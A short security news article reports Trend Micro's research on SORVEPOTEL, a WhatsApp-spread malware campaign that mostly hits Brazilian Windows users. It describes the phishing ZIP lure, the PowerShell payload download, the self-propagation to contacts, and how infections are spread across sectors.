New self-replicating WhatsApp malware called SORVEPOTEL

Brazilian users have become the primary target of a new self-propagating malware campaign, codenamed SORVEPOTEL by Trend Micro. This malware exploits the trust associated with the popular messaging app WhatsApp to extend its reach across Windows systems. Researchers, including Jeffrey Francis Bonaobra, Maristel Policarpio, Sophia Nilette Robles, Cj Arsley Mateo, Jacob Santos, and Paul John Bardon, noted that the attack is “engineered for speed and propagation” rather than for data theft or ransomware. The malware spreads through convincing phishing messages containing malicious ZIP file attachments, which require users to open them on a desktop. This suggests that the threat actors may be more focused on targeting enterprises rather than individual consumers.

Once the attachment is opened, the malware automatically propagates via the desktop web version of WhatsApp, leading to account bans due to excessive spam. The majority of infections, 457 out of 477 cases, are concentrated in Brazil, affecting various sectors, including government, public service, manufacturing, technology, education, and construction. The attack begins with a phishing message from a compromised contact, lending credibility to the malicious ZIP attachment, which masquerades as a harmless file. Evidence also indicates that the operators have used emails from seemingly legitimate addresses to distribute the ZIP files. If the recipient opens the attachment, they inadvertently execute a PowerShell script that retrieves the main payload from an external server. This payload establishes persistence on the host and spreads the malware to all contacts and groups on WhatsApp, resulting in a high volume of spam messages and frequent account suspensions.